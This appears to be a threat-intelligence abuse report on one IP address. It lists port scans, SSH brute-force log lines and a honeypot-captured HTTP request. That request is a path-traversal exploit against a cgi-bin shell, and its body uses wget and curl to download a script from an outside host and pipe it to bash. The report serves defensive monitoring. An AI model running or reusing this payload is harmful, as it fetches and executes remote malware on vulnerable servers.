This IP address carried out 6 port scanning attempts on 28-08-2023. For more information or to report interesting/incorrect findings, give me a shoutout @parthmaniar on Twitter.
ThreatBook Intelligence: Dynamic IP,Exploit more details on https://threatbook.io/ip/111.42.95.131
2023-08-28 01:55:55 /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh,{"body":"wget http://download.asyncfox.xyz/download/dupa2.sh -O- | bash; curl -O http://download.asyncfox.xyz/download/dupa2.sh | bash; echo Okk","content_type":"text/plain","header":{"Accept":["*/*"],"Connection":["keep-alive"],"Content-Length":["135"],"Content-Type":["text/plain"],"Upgrade-Insecure-Requests":["1"],"User-Agent":["Custom-AsyncHttpClient"]},"host":"162.14.104.97:80","method":"POST","proto":"HTTP/1.1","remote_addr":"111.42.95.131:53986","status_code":200,"url":"/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh","user_agent":"Custom-AsyncHttpClient"}
fail2ban apache-modsecurity [msg "Request content type is not allowed by policy"] [uri "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"]
Web App Attack
Anonymous
Aug 29 00:18:41 f2b auth.info sshd[1184119]: Invalid user 123456 from 111.42.95.131 port 33196
Aug 29 00:18:41 f2b auth.info sshd[1184119]: Failed password for invalid user 123456 from 111.42.95.131 port 33196 ssh2
Aug 29 00:19:13 f2b auth.info sshd[1184121]: Failed password for root from 111.42.95.131 port 34582 ssh2
...